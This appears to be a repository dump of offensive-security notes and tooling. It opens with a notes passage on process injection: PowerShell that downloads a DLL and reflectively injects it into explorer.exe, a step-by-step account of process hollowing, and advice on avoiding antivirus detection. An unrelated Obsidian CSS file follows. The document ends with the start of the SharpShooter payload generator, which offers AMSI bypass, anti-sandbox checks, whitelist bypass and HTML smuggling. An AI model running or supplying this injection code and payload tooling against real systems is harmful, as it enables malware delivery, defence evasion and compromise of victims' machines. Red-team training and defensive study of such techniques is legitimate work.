remote process loads our DLL and runs its entry point, which is how we execute a DLL in a remote process. 
292 | 293 |   294 | 295 | > Documentation : 296 | > 297 | > - https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya 298 | > - https://codingvision.net/c-inject-a-dll-into-a-process-w-createremotethread 299 | 300 |   301 | 302 | # Reflective DLL Injection 303 | 304 | - In DLL injection, the DLL is loaded from disk into the remote process. Writing the DLL to disk can trigger AV and can compromise our attack. 305 | - A workaround to this problem would be to implement Reflective DLL injection. The DLL is injected into the victim process directly from memory rather than from disk. 306 | - This basically maps the DLL's Portable Executable format content into memory. 307 | - We can use a PowerShell module to implement the functionality of LoadLibrary while avoiding writing to disk, which also helps avoid detection by Process Explorer and AV. 308 | - For this we can use _Invoke-ReflectivePEInjection_ to parse the contents of the PE file and perform reflective loading to avoid writing to disk. 309 | - This tool has two functionalities: reflectively load a PE/EXE into the same process, or reflectively load a DLL into a remote process. 
310 | 311 | Import the PowerShell module : 312 | 313 | Import-Module Invoke-ReflectivePEInjection.ps1 314 | 315 | PowerShell code to perform Reflective DLL Injection 316 | 317 | $bytes = (New-Object System.Net.WebClient).DownloadData('') 318 | $procid = (Get-Process -Name explorer).Id 319 | 320 | Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId $procid 321 | 322 |   323 | 324 | > Documentation : 325 | > 326 | > - https://github.com/stephenfewer/ReflectiveDLLInjection 327 | > - https://docs.microsoft.com/en-us/windows/win32/debug/pe-format 328 | > - https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1 329 | > - https://www.ired.team/offensive-security/code-injection-process-injection/reflective-dll-injection 330 | 331 |   332 | 333 | # Process Hollowing 334 | 335 | - The issue with the above methods of process injection is that we may still be detected, since network traffic originating from programs such as explorer and notepad is unusual. 336 | - We could instead migrate to svchost to mask our identity, as it normally generates network activity. 337 | - The problem here is that svchost runs at SYSTEM integrity level by default, so we cannot inject into such processes. 338 | - We can solve this problem by using a method called **Process Hollowing**, in which we start the process suspended and then modify it before it starts execution. 339 | 340 | ## Theory 341 | 342 | - During the creation of a process using the _CreateProcess_ API, we can set the CREATE_SUSPENDED flag to create a new suspended process. 343 | - When a process is created using _CreateProcess_, the OS does a few things: 344 | - Creates the virtual memory space for the process 345 | - Allocates the stack along with the Thread Environment Block (TEB) and Process Environment Block (PEB) 346 | - Loads the required EXE and DLLs into memory 347 | - Once the above tasks are done, the OS will create a thread to execute the code. 
If we supply the CREATE_SUSPENDED flag, then execution will stop just before the first instruction runs. 348 | - Now, to locate the entrypoint of the executable, we can use the _ZwQueryInformationProcess_ API to retrieve the address of the PEB. 349 | - From the PEB, we can obtain the base address of the process and use this to parse the PE headers and locate the entrypoint. 350 | - We can find the base address at an offset of 0x10 into the PEB 351 | - After _ZwQueryInformationProcess_ yields the address of the PEB, we can use the _ReadProcessMemory_ API to read the contents of the PEB at offset 0x10 352 | - First we read the e_lfanew field at offset 0x3C; this contains the offset from the beginning of the PE file to the PE header. 353 | - We then read the Relative Virtual Address (RVA) of the entrypoint at offset 0x28 from the PE header; this needs to be added to the base address of the remote process to obtain the absolute memory address. 354 | - Once we have the entrypoint of the remote process, we can use _WriteProcessMemory_ to overwrite the original contents of the executable at that address. 355 | - We can then resume execution of the thread. 356 | 357 | > All PE files follow a standard format, which helps us predict where to find the required offsets. 
358 | 359 | > Documentation : 360 | > 361 | > - https://en.wikipedia.org/wiki/Win32_Thread_Information_Block 362 | > - https://en.wikipedia.org/wiki/Process_Environment_Block 363 | > - https://en.wikipedia.org/wiki/Address_space_layout_randomization 364 | > - https://docs.microsoft.com/en-us/windows/win32/procthread/zwqueryinformationprocess 365 | > - https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-readprocessmemory 366 | > - https://gist.github.com/smgorelik/9a80565d44178771abf1e4da4e2a0e75 367 | > - https://github.com/sbridgens/ProcessHollowing 368 | -------------------------------------------------------------------------------- /.obsidian/plugins/obsidian-image-toolkit/styles.css: -------------------------------------------------------------------------------- 1 | body { 2 | --layer-image-toolkit-popup: 1024; 3 | --layer-image-toolkit-player: 1025; 4 | --layer-image-toolkit-notice: 1026; 5 | --layer-menu: 1027; 6 | } 7 | 8 | .menu { 9 | z-index: var(--layer-menu); 10 | } 11 | 12 | .notice-container { 13 | z-index: var(--layer-image-toolkit-notice); 14 | } 15 | 16 | .oit-main-container-view li::before { 17 | margin-left: 0; 18 | } 19 | 20 | .image-toolkit-img-invert { 21 | filter: invert(1) hue-rotate(180deg); 22 | mix-blend-mode: screen; 23 | } 24 | 25 | .oit-main-container-view { 26 | position: fixed; 27 | font-size: 0; 28 | line-height: 0; 29 | top: 0; 30 | bottom: 0; 31 | left: 0; 32 | right: 0; 33 | background: rgba(0, 0, 0, .6); 34 | z-index: var(--layer-image-toolkit-popup); 35 | display: none; 36 | } 37 | 38 | .oit-pin-container-view { 39 | position: fixed; 40 | font-size: 0; 41 | line-height: 0; 42 | z-index: var(--layer-image-toolkit-popup); 43 | display: none; 44 | } 45 | 46 | .oit-main-container-view .img-container, 47 | .oit-pin-container-view .img-container { 48 | position: absolute; 49 | top: 0; 50 | pointer-events: none; 51 | } 52 | 53 | .oit-main-container-view .img-container .img-view { 54 | max-height: none; 55 | 
pointer-events: auto; 56 | } 57 | 58 | .oit-pin-container-view .img-container .img-view { 59 | position: absolute; 60 | max-height: none; 61 | pointer-events: auto; 62 | box-shadow: 0 0 5px; 63 | } 64 | 65 | .oit-pin-container-view .img-container .img-view:hover { 66 | box-shadow: 0 0 6px #55acc6; 67 | } 68 | 69 | .oit-main-container-view .img-default-background, 70 | .oit-pin-container-view .img-default-background { 71 | background-position: 0 0, 5px 5px !important; 72 | background-size: 10px 10px !important; 73 | background-image: linear-gradient(45deg, #eee 25%, transparent 25%, transparent 75%, #eee 75%, #eee 100%), linear-gradient(45deg, #eee 25%, #fff 25%, #fff 75%, #eee 75%, #eee 100%) !important; 74 | } 75 | 76 | .oit-main-container-view .img-container .img-view:hover, 77 | .oit-pin-container-view .img-container .img-view:hover { 78 | cursor: pointer; 79 | } 80 | 81 | .oit-main-container-view .img-close { 82 | position: absolute; 83 | width: 32px; 84 | height: 32px; 85 | top: 0; 86 | right: 0; 87 | cursor: pointer; 88 | } 89 | 90 | .oit-main-container-view .img-tip, 91 | .oit-pin-container-view .img-tip { 92 | position: absolute; 93 | top: 50%; 94 | left: 50%; 95 | font-size: 12px; 96 | line-height: 20px; 97 | height: 20px; 98 | width: 50px; 99 | text-align: center; 100 | color: #fff; 101 | border-radius: 10px; 102 | background-color: rgba(0, 0, 0, .4); 103 | pointer-events: none; 104 | z-index: 1; 105 | } 106 | 107 | .oit-main-container-view .img-player, 108 | .oit-pin-container-view .img-player { 109 | display: none; 110 | position: fixed; 111 | width: 100%; 112 | height: 100%; 113 | left: 0; 114 | top: 0; 115 | cursor: none; 116 | background-color: #000; 117 | text-align: center; 118 | cursor: pointer; 119 | } 120 | 121 | .oit-main-container-view .img-player > img, 122 | .oit-pin-container-view .img-player > img { 123 | display: inline; 124 | float: none; 125 | padding: 0; 126 | max-height: none; 127 | transform: none; 128 | cursor: pointer; 129 | } 130 
| 131 | .oit-main-container-view .img-footer { 132 | position: absolute; 133 | text-align: center; 134 | bottom: 5px; 135 | left: 0; 136 | right: 0; 137 | } 138 | 139 | .oit-main-container-view .img-footer .img-title { 140 | font-size: 12px; 141 | line-height: 1; 142 | display: inline-block; 143 | max-width: 90%; 144 | white-space: nowrap; 145 | text-overflow: ellipsis; 146 | margin: 5px; 147 | opacity: .8; 148 | color: #fff; 149 | /* filter: alpha(opacity=80) */ 150 | } 151 | 152 | .oit-main-container-view .img-footer .img-title:hover { 153 | /* opacity: 1; */ 154 | color: #fff; 155 | font-size: 15px; 156 | background-color: rgba(0, 0, 0, .3); 157 | border-radius: 8px; 158 | line-height: 1.5; 159 | /* filter: alpha(opacity=100) */ 160 | } 161 | 162 | .oit-main-container-view .img-footer .img-toolbar { 163 | width: 385px; 164 | height: 30px; 165 | margin: 0 auto 5px; 166 | padding: 3px 0; 167 | } 168 | 169 | .oit-main-container-view .img-footer .img-toolbar:hover { 170 | background-color: rgba(0, 0, 0, .3); 171 | border-radius: 12px; 172 | } 173 | 174 | .oit-main-container-view .img-footer .img-toolbar > li { 175 | float: left; 176 | width: 25px; 177 | height: 25px; 178 | margin: 0 5px; 179 | padding: 0; 180 | line-height: 0; 181 | border: none; 182 | cursor: pointer; 183 | overflow: hidden; 184 | } 185 | 186 | .oit-main-container-view .img-footer .img-toolbar > li:hover { 187 | animation: bounce .5s cubic-bezier(0.51, 0.23, 0.02, 0.96) 188 | } 189 | 190 | @keyframes bounce { 191 | 0% { 192 | transform: scale(1, 1); 193 | } 194 | 195 | 50% { 196 | transform: scale(0.85, 1.1) translateY(-5px); 197 | } 198 | } 199 | 200 | .oit-main-container-view .img-footer .img-toolbar .toolbar_zoom_to_100::before, 201 | .oit-main-container-view .img-footer .img-toolbar .toolbar_zoom_in::before, 202 | .oit-main-container-view .img-footer .img-toolbar .toolbar_zoom_out::before, 203 | .oit-main-container-view .img-footer .img-toolbar .toolbar_full_screen::before, 204 | 
.oit-main-container-view .img-footer .img-toolbar .toolbar_refresh::before, 205 | .oit-main-container-view .img-footer .img-toolbar .toolbar_rotate_left::before, 206 | .oit-main-container-view .img-footer .img-toolbar .toolbar_rotate_right::before, 207 | .oit-main-container-view .img-footer .img-toolbar .toolbar_scale_x::before, 208 | .oit-main-container-view .img-footer .img-toolbar .toolbar_scale_y::before, 209 | .oit-main-container-view .img-footer .img-toolbar .toolbar_invert_color::before, 210 | .oit-main-container-view .img-footer .img-toolbar .toolbar_copy::before { 211 | font-size: 0; 212 | line-height: 0; 213 | display: block; 214 | width: 25px; 215 | height: 25px; 216 | color: transparent; 217 | background-image: url(); 218 | background-repeat: no-repeat 219 | } 220 | 221 | .oit-main-container-view .img-footer .img-toolbar .toolbar_zoom_to_100::before { 222 | content: 'Zoom to Actual Size'; 223 | background-position: 0 0 224 | } 225 | 226 | .oit-main-container-view .img-footer .img-toolbar .toolbar_zoom_in::before { 227 | content: 'Zoom In'; 228 | background-position: -25px 0 229 | } 230 | 231 | .oit-main-container-view .img-footer .img-toolbar .toolbar_zoom_out::before { 232 | content: 'Zoom Out'; 233 | background-position: -50px 0 234 | } 235 | 236 | .oit-main-container-view .img-footer .img-toolbar .toolbar_full_screen::before { 237 | content: 'Full Screen'; 238 | background-position: -75px 0 239 | } 240 | 241 | .oit-main-container-view .img-footer .img-toolbar .toolbar_refresh::before { 242 | content: 'Refresh'; 243 | background-position: -100px 0 244 | } 245 | 246 | .oit-main-container-view .img-footer .img-toolbar .toolbar_rotate_left::before { 247 | content: 'Rotate Left'; 248 | background-position: -125px 0 249 | } 250 | 251 | .oit-main-container-view .img-footer .img-toolbar .toolbar_rotate_right::before { 252 | content: 'Rotate Right'; 253 | background-position: -150px 0 254 | } 255 | 256 | .oit-main-container-view .img-footer .img-toolbar 
.toolbar_scale_x::before { 257 | content: 'Scale x'; 258 | background-position: -175px 0 259 | } 260 | 261 | .oit-main-container-view .img-footer .img-toolbar .toolbar_scale_y::before { 262 | content: 'Scale y'; 263 | background-position: -200px 0 264 | } 265 | 266 | .oit-main-container-view .img-footer .img-toolbar .toolbar_invert_color::before { 267 | content: 'Invert color'; 268 | background-position: -225px 0 269 | } 270 | 271 | .oit-main-container-view .img-footer .img-toolbar .toolbar_copy::before { 272 | content: 'Copy'; 273 | background-position: -250px 0 274 | } 275 | 276 | /*====== gallery-navbar start ======*/ 277 | .oit-main-container-view .img-footer .gallery-navbar { 278 | position: relative; 279 | flex: 0 0 auto; 280 | overflow: hidden; 281 | max-width: 100%; 282 | max-height: 100%; 283 | width: 100%; 284 | height: 60px; 285 | margin-top: 20px; 286 | background-color: rgba(0, 0, 0, .1); 287 | } 288 | 289 | .oit-main-container-view .img-footer .gallery-navbar:hover { 290 | background-color: rgba(0, 0, 0, .8); 291 | } 292 | 293 | .oit-main-container-view .img-footer .gallery-navbar .gallery-list { 294 | display: flex; 295 | transform: translateX(0px); 296 | cursor: pointer; 297 | } 298 | 299 | .oit-main-container-view .img-footer .gallery-navbar .gallery-list .gallery-active { 300 | opacity: 1; 301 | } 302 | 303 | .oit-main-container-view .img-footer .gallery-navbar .gallery-list .img-border-active { 304 | margin-top: 1px; 305 | border-width: 1px; 306 | border-style: solid; 307 | border-color: red; 308 | } 309 | 310 | .oit-main-container-view .img-footer .gallery-navbar .gallery-list > li { 311 | width: 48px; 312 | height: 58px; 313 | opacity: .3; 314 | color: transparent; 315 | margin: 2px 1px; 316 | padding: 0; 317 | border-radius: 0; 318 | /* transition: all 100ms linear; */ 319 | } 320 | 321 | .oit-main-container-view .img-footer .gallery-navbar .gallery-list img { 322 | width: 46px; 323 | height: 56px; 324 | } 325 | 326 | /*====== gallery-navbar 
end ======*/ 327 | 328 | /*====== pickr start ======*/ 329 | .pcr-app .pcr-swatches > button { 330 | padding: 0; 331 | } 332 | 333 | /*! Pickr 1.8.2 MIT | https://github.com/Simonwep/pickr */ 334 | .pickr {position: relative;overflow: visible;transform: translateY(0)} .pickr * {box-sizing: border-box;outline: none;border: none;-webkit-appearance: none} .pickr .pcr-button {position: relative;height: 2em;width: 2em;padding: 0.5em;cursor: pointer;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Helvetica Neue", Arial, sans-serif;border-radius: .15em;background: url('data:image/svg+xml;utf8, ') no-repeat center;background-size: 0;transition: all 0.3s} .pickr .pcr-button::before {position: absolute;content: '';top: 0;left: 0;width: 100%;height: 100%;background: url('data:image/svg+xml;utf8, ');background-size: .5em;border-radius: .15em;z-index: -1} .pickr .pcr-button::before {z-index: initial} .pickr .pcr-button::after {position: absolute;content: '';top: 0;left: 0;height: 100%;width: 100%;transition: background 0.3s;background: var(--pcr-color);border-radius: .15em} .pickr .pcr-button.clear {background-size: 70%} .pickr .pcr-button.clear::before {opacity: 0} .pickr .pcr-button.clear:focus {box-shadow: 0 0 0 1px rgba(255, 255, 255, 0.85), 0 0 0 3px var(--pcr-color)} .pickr .pcr-button.disabled {cursor: not-allowed} .pickr *, .pcr-app * {box-sizing: border-box;outline: none;border: none;-webkit-appearance: none} .pickr input:focus, .pickr input.pcr-active, .pickr button:focus, .pickr button.pcr-active, .pcr-app input:focus, .pcr-app input.pcr-active, .pcr-app button:focus, .pcr-app button.pcr-active {box-shadow: 0 0 0 1px rgba(255, 255, 255, 0.85), 0 0 0 3px var(--pcr-color)} .pickr .pcr-palette, .pickr .pcr-slider, .pcr-app .pcr-palette, .pcr-app .pcr-slider {transition: box-shadow 0.3s} .pickr .pcr-palette:focus, .pickr .pcr-slider:focus, .pcr-app .pcr-palette:focus, .pcr-app .pcr-slider:focus {box-shadow: 0 0 0 1px rgba(255, 255, 255, 0.85), 0 0 
0 3px rgba(0, 0, 0, 0.25)} .pcr-app {position: fixed;display: flex;flex-direction: column;z-index: 10000;border-radius: 0.1em;background: #fff;opacity: 0;visibility: hidden;transition: opacity 0.3s, visibility 0s 0.3s;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Helvetica Neue", Arial, sans-serif;box-shadow: 0 0.15em 1.5em 0 rgba(0, 0, 0, 0.1), 0 0 1em 0 rgba(0, 0, 0, 0.03);left: 0;top: 0} .pcr-app.visible {transition: opacity 0.3s;visibility: visible;opacity: 1} .pcr-app .pcr-swatches {display: flex;flex-wrap: wrap;margin-top: 0.75em} .pcr-app .pcr-swatches.pcr-last {margin: 0} @supports (display: grid) { .pcr-app .pcr-swatches {display: grid;align-items: center;grid-template-columns: repeat(auto-fit, 1.75em)} } .pcr-app .pcr-swatches > button {font-size: 1em;position: relative;width: calc(1.75em - 10px);height: calc(1.75em - 10px);border-radius: 0.15em;cursor: pointer;margin: 2.5px;flex-shrink: 0;justify-self: center;transition: all 0.15s;overflow: hidden;background: transparent;z-index: 1} .pcr-app .pcr-swatches > button::before {position: absolute;content: '';top: 0;left: 0;width: 100%;height: 100%;background: url('data:image/svg+xml;utf8, ');background-size: 6px;border-radius: .15em;z-index: -1} .pcr-app .pcr-swatches > button::after {content: '';position: absolute;top: 0;left: 0;width: 100%;height: 100%;background: var(--pcr-color);border: 1px solid rgba(0, 0, 0, 0.05);border-radius: 0.15em;box-sizing: border-box} .pcr-app .pcr-swatches > button:hover {filter: brightness(1.05)} .pcr-app .pcr-swatches > button:not(.pcr-active) {box-shadow: none} .pcr-app .pcr-interaction {display: flex;flex-wrap: wrap;align-items: center;margin: 0 -0.2em 0 -0.2em} .pcr-app .pcr-interaction > * {margin: 0 0.2em} .pcr-app .pcr-interaction input {letter-spacing: 0.07em;font-size: 0.75em;text-align: center;cursor: pointer;color: #75797e;background: #f1f3f4;border-radius: .15em;transition: all 0.15s;padding: 0.45em 0.5em;margin-top: 0.75em} .pcr-app 
.pcr-interaction input:hover {filter: brightness(0.975)} .pcr-app .pcr-interaction input:focus {box-shadow: 0 0 0 1px rgba(255, 255, 255, 0.85), 0 0 0 3px rgba(66, 133, 244, 0.75)} .pcr-app .pcr-interaction .pcr-result {color: #75797e;text-align: left;flex: 1 1 8em;min-width: 8em;transition: all 0.2s;border-radius: .15em;background: #f1f3f4;cursor: text} .pcr-app .pcr-interaction .pcr-result::-moz-selection {background: #4285f4;color: #fff} .pcr-app .pcr-interaction .pcr-result::selection {background: #4285f4;color: #fff} .pcr-app .pcr-interaction .pcr-type.active {color: #fff;background: #4285f4} .pcr-app .pcr-interaction .pcr-save, .pcr-app .pcr-interaction .pcr-cancel, .pcr-app .pcr-interaction .pcr-clear {color: #fff;width: auto} .pcr-app .pcr-interaction .pcr-save, .pcr-app .pcr-interaction .pcr-cancel, .pcr-app .pcr-interaction .pcr-clear {color: #fff} .pcr-app .pcr-interaction .pcr-save:hover, .pcr-app .pcr-interaction .pcr-cancel:hover, .pcr-app .pcr-interaction .pcr-clear:hover {filter: brightness(0.925)} .pcr-app .pcr-interaction .pcr-save {background: #4285f4} .pcr-app .pcr-interaction .pcr-clear, .pcr-app .pcr-interaction .pcr-cancel {background: #f44250} .pcr-app .pcr-interaction .pcr-clear:focus, .pcr-app .pcr-interaction .pcr-cancel:focus {box-shadow: 0 0 0 1px rgba(255, 255, 255, 0.85), 0 0 0 3px rgba(244, 66, 80, 0.75)} .pcr-app .pcr-selection .pcr-picker {position: absolute;height: 18px;width: 18px;border: 2px solid #fff;border-radius: 100%;-webkit-user-select: none;-moz-user-select: none;-ms-user-select: none;user-select: none} .pcr-app .pcr-selection .pcr-color-palette, .pcr-app .pcr-selection .pcr-color-chooser, .pcr-app .pcr-selection .pcr-color-opacity {position: relative;-webkit-user-select: none;-moz-user-select: none;-ms-user-select: none;user-select: none;display: flex;flex-direction: column;cursor: grab;cursor: -webkit-grab} .pcr-app .pcr-selection .pcr-color-palette:active, .pcr-app .pcr-selection .pcr-color-chooser:active, .pcr-app 
.pcr-selection .pcr-color-opacity:active {cursor: grabbing;cursor: -webkit-grabbing} .pcr-app[data-theme='nano'] {width: 14.25em;max-width: 95vw} .pcr-app[data-theme='nano'] .pcr-swatches {margin-top: .6em;padding: 0 .6em} .pcr-app[data-theme='nano'] .pcr-interaction {padding: 0 .6em .6em .6em} .pcr-app[data-theme='nano'] .pcr-selection {display: grid;grid-gap: .6em;grid-template-columns: 1fr 4fr;grid-template-rows: 5fr auto auto;align-items: center;height: 10.5em;width: 100%;align-self: flex-start} .pcr-app[data-theme='nano'] .pcr-selection .pcr-color-preview {grid-area: 2 / 1 / 4 / 1;height: 100%;width: 100%;display: flex;flex-direction: row;justify-content: center;margin-left: .6em} .pcr-app[data-theme='nano'] .pcr-selection .pcr-color-preview .pcr-last-color {display: none} .pcr-app[data-theme='nano'] .pcr-selection .pcr-color-preview .pcr-current-color {position: relative;background: var(--pcr-color);width: 2em;height: 2em;border-radius: 50em;overflow: hidden} .pcr-app[data-theme='nano'] .pcr-selection .pcr-color-preview .pcr-current-color::before {position: absolute;content: '';top: 0;left: 0;width: 100%;height: 100%;background: url('data:image/svg+xml;utf8, ');background-size: .5em;border-radius: .15em;z-index: -1} .pcr-app[data-theme='nano'] .pcr-selection .pcr-color-palette {grid-area: 1 / 1 / 2 / 3;width: 100%;height: 100%;z-index: 1} .pcr-app[data-theme='nano'] .pcr-selection .pcr-color-palette .pcr-palette {border-radius: .15em;width: 100%;height: 100%} .pcr-app[data-theme='nano'] .pcr-selection .pcr-color-palette .pcr-palette::before {position: absolute;content: '';top: 0;left: 0;width: 100%;height: 100%;background: url('data:image/svg+xml;utf8, ');background-size: .5em;border-radius: .15em;z-index: -1} .pcr-app[data-theme='nano'] .pcr-selection .pcr-color-chooser {grid-area: 2 / 2 / 2 / 2} .pcr-app[data-theme='nano'] .pcr-selection .pcr-color-opacity {grid-area: 3 / 2 / 3 / 2} .pcr-app[data-theme='nano'] .pcr-selection .pcr-color-chooser, 
.pcr-app[data-theme='nano'] .pcr-selection .pcr-color-opacity {height: 0.5em;margin: 0 .6em} .pcr-app[data-theme='nano'] .pcr-selection .pcr-color-chooser .pcr-picker, .pcr-app[data-theme='nano'] .pcr-selection .pcr-color-opacity .pcr-picker {top: 50%;transform: translateY(-50%)} .pcr-app[data-theme='nano'] .pcr-selection .pcr-color-chooser .pcr-slider, .pcr-app[data-theme='nano'] .pcr-selection .pcr-color-opacity .pcr-slider {flex-grow: 1;border-radius: 50em} .pcr-app[data-theme='nano'] .pcr-selection .pcr-color-chooser .pcr-slider {background: linear-gradient(to right, red, #ff0, lime, cyan, blue, #f0f, red)} .pcr-app[data-theme='nano'] .pcr-selection .pcr-color-opacity .pcr-slider {background: linear-gradient(to right, transparent, black), url('data:image/svg+xml;utf8, ');background-size: 100%, 0.25em} 335 | 336 | /*====== pickr end ======*/ 337 | 338 | .hotkeys-settings-plus { 339 | margin: 0 10px; 340 | font-size: x-large; 341 | } 342 | -------------------------------------------------------------------------------- /Tools/SharpShooter/SharpShooter.py: -------------------------------------------------------------------------------- 1 | #! 
/usr/bin/env python 2 | 3 | # -*- coding: utf-8 -*- 4 | # 5 | # SharpShooter: 6 | # Payload Generation with CSharp and DotNetToJScript 7 | # Version: 8 | # 2.0 9 | # Author: 10 | # Dominic Chell (@domchell), MDSec ActiveBreach (@mdseclabs) 11 | 12 | from __future__ import print_function 13 | 14 | import base64 15 | import gzip 16 | import random 17 | import string 18 | import sys 19 | import argparse 20 | from jsmin import jsmin 21 | from modules import * 22 | 23 | try: 24 | raw_input 25 | input = raw_input 26 | except NameError: 27 | pass 28 | 29 | try: 30 | from cStringIO import StringIO as BytesIO 31 | except ImportError: 32 | from io import BytesIO 33 | 34 | 35 | class SharpShooter: 36 | banner = """ 37 | _____ __ _____ __ __ 38 | / ___// /_ ____ __________ / ___// /_ ____ ____ / /____ _____ 39 | \__ \/ __ \/ __ `/ ___/ __ \\__ \/ __ \/ __ \/ __ \/ __/ _ \/ ___/ 40 | ___/ / / / / /_/ / / / /_/ /__/ / / / / /_/ / /_/ / /_/ __/ / 41 | /____/_/ /_/\__,_/_/ / .___/____/_/ /_/\____/\____/\__/\___/_/ 42 | /_/ 43 | 44 | \033[1;32mDominic Chell, @domchell, MDSec ActiveBreach, v2.0\033[0;0m 45 | """ 46 | 47 | def validate_args(self): 48 | print(self.banner) 49 | 50 | antisandbox = "\n\033[92m[1]\033[0;0m Key to Domain (e.g. 
1=CONTOSO)" 51 | antisandbox += "\n\033[92m[2]\033[0;0m Ensure Domain Joined" 52 | antisandbox += "\n\033[92m[3]\033[0;0m Check for Sandbox Artifacts" 53 | antisandbox += "\n\033[92m[4]\033[0;0m Check for Bad MACs" 54 | antisandbox += "\n\033[92m[5]\033[0;0m Check for Debugging" 55 | 56 | parser = argparse.ArgumentParser(description="", formatter_class=argparse.RawTextHelpFormatter) 57 | parser.add_argument("--stageless", action='store_true', help="Create a stageless payload") 58 | parser.add_argument("--dotnetver", metavar="", dest="dotnetver", default=None, help="Target .NET Version: 2 or 4") 59 | parser.add_argument("--com", metavar="", dest="comtechnique", default=None, help="COM Staging Technique: outlook, shellbrowserwin, wmi, wscript, xslremote") 60 | parser.add_argument("--awl", metavar="", dest="awltechnique", default=None, help="Application Whitelist Bypass Technique: wmic, regsvr32") 61 | parser.add_argument("--awlurl", metavar="", dest="awlurl", default=None, help="URL to retrieve XSL/SCT payload") 62 | parser.add_argument("--payload", metavar="", dest="payload", default=None, help="Payload type: hta, js, jse, vbe, vbs, wsf, macro, slk") 63 | parser.add_argument("--sandbox", metavar="", dest="sandbox", default=None, help="Anti-sandbox techniques: " + antisandbox) 64 | parser.add_argument("--amsi", metavar="", dest="amsi", default=None, help="Use amsi bypass technique: amsienable") 65 | parser.add_argument("--delivery", metavar="", dest="delivery", default=None, help="Delivery method: web, dns, both") 66 | parser.add_argument("--rawscfile", metavar="", dest="rawscfile", default=None, help="Path to raw shellcode file for stageless payloads") 67 | parser.add_argument("--shellcode", action='store_true', help="Use built in shellcode execution") 68 | parser.add_argument("--scfile", metavar="", dest="shellcode_file", default=None, help="Path to shellcode file as CSharp byte array") 69 | parser.add_argument("--refs", metavar="", dest="refs", default=None, 
help="References required to compile custom CSharp,\ne.g. mscorlib.dll,System.Windows.Forms.dll") 70 | parser.add_argument("--namespace", metavar="", dest="namespace", default=None, help="Namespace for custom CSharp,\ne.g. Foo.bar") 71 | parser.add_argument("--entrypoint", metavar="", dest="entrypoint", default=None, help="Method to execute,\ne.g. Main") 72 | parser.add_argument("--web", metavar="", dest="web", default=None, help="URI for web delivery") 73 | parser.add_argument("--dns", metavar="", dest="dns", default=None, help="Domain for DNS delivery") 74 | parser.add_argument("--output", metavar="", dest="output", default=None, help="Name of output file (e.g. maldoc)") 75 | parser.add_argument("--smuggle", action='store_true', help="Smuggle file inside HTML") 76 | parser.add_argument("--template", metavar="", dest="template", default=None, help="Name of template file (e.g. mcafee)") 77 | 78 | args = parser.parse_args() 79 | 80 | if not args.dotnetver and not args.payload=="slk": 81 | print("\033[1;31m[!]\033[0;0m Missing --dotnetver argument") 82 | sys.exit(-1) 83 | else: 84 | if not args.payload=="slk": 85 | try: 86 | dotnetver = int(args.dotnetver) 87 | 88 | if (not dotnetver == 2 and not dotnetver == 4): 89 | raise Exception 90 | except Exception as e: 91 | print("\033[1;31m[!]\033[0;0m Invalid .NET version") 92 | sys.exit(-1) 93 | 94 | if not args.payload: 95 | print("\033[1;31m[!]\033[0;0m Missing --payload argument") 96 | sys.exit(-1) 97 | if not args.delivery and not args.stageless and not args.payload=="slk": 98 | print("\033[1;31m[!]\033[0;0m Missing --delivery argument") 99 | sys.exit(-1) 100 | if not args.output: 101 | print("\033[1;31m[!]\033[0;0m Missing --output argument") 102 | sys.exit(-1) 103 | 104 | if(args.stageless) and (args.delivery or args.dns or args.web): 105 | print("\033[1;31m[!]\033[0;0m Stageless payloads are not compatible with delivery arguments") 106 | sys.exit(-1) 107 | 108 | if(args.delivery == "both"): 109 | if(not args.web or 
not args.dns): 110 | print("\033[1;31m[!]\033[0;0m Missing --web and --dns arguments") 111 | sys.exit(-1) 112 | elif(args.delivery == "web"): 113 | if not args.web: 114 | print("\033[1;31m[!]\033[0;0m Missing --web arguments") 115 | sys.exit(-1) 116 | elif(args.delivery == "dns"): 117 | if not args.dns: 118 | print("\033[1;31m[!]\033[0;0m Missing --dns arguments") 119 | sys.exit(-1) 120 | elif(args.delivery): 121 | print("\033[1;31m[!]\033[0;0m Invalid delivery method") 122 | sys.exit(-1) 123 | 124 | if(not args.shellcode and not args.stageless and not args.payload=="slk"): 125 | if not args.refs or not args.namespace or not args.entrypoint: 126 | print("\033[1;31m[!]\033[0;0m Custom CSharp selected, --refs, --namespace and --entrypoint arguments required") 127 | sys.exit(-1) 128 | else: 129 | if(not args.shellcode_file and not args.stageless and not args.payload=="slk"): 130 | print("\033[1;31m[!]\033[0;0m Built-in CSharp template selected, --scfile argument required") 131 | sys.exit(-1) 132 | 133 | if(args.stageless and not args.rawscfile): 134 | print("\033[1;31m[!]\033[0;0m Stageless payloads require the --rawscfile argument") 135 | sys.exit(-1) 136 | 137 | if(args.smuggle): 138 | if not args.template: 139 | print("\033[1;31m[!]\033[0;0m Template name required when smuggling") 140 | sys.exit(-1) 141 | 142 | if(args.comtechnique): 143 | if not args.awlurl: 144 | print("\033[1;31m[!]\033[0;0m --awlurl required when COM staging") 145 | sys.exit(-1) 146 | 147 | if(args.payload == "macro" and args.smuggle): 148 | print("\033[1;31m[!]\033[0;0m Macro payload cannot be smuggled") 149 | sys.exit(-1) 150 | 151 | if(args.payload == "macro" and not args.comtechnique=="xslremote"): 152 | print("\033[1;31m[!]\033[0;0m Macro payload requires the --com xsmlremote and --awlurl arguments") 153 | sys.exit(-1) 154 | 155 | if(args.payload == "slk" and args.comtechnique): 156 | print("\033[1;31m[!]\033[0;0m SLK payloads do not currently support COM staging") 157 | sys.exit(-1) 158 | 
# Tail of validate_args(): the function begins above this span, only its last
# check and its return are visible here.
        if(args.payload == "slk"):
            print("\033[1;31m[!]\033[0;0m Shellcode must not contain null bytes")

        return args

    def read_file(self, f):
        """Return the whole contents of path `f`, read in text mode ('r').

        Used both for the templates/ files and for the shellcode / raw
        shellcode inputs, so every input is read as a Python 2 str.
        """
        with open(f, 'r') as fs:
            content = fs.read()
        return content

    def rand_key(self, n):
        """Return a string of `n` random lowercase ASCII letters.

        Uses the `random` module (not a CSPRNG) plus string.lowercase and
        xrange, i.e. this is Python 2 code. The key is later written into the
        output harness next to the RC4-encrypted body, so it obfuscates the
        payload at rest rather than keeping it confidential.
        """
        return ''.join([random.choice(string.lowercase) for i in xrange(n)])

    def gzip_str(self, string_):
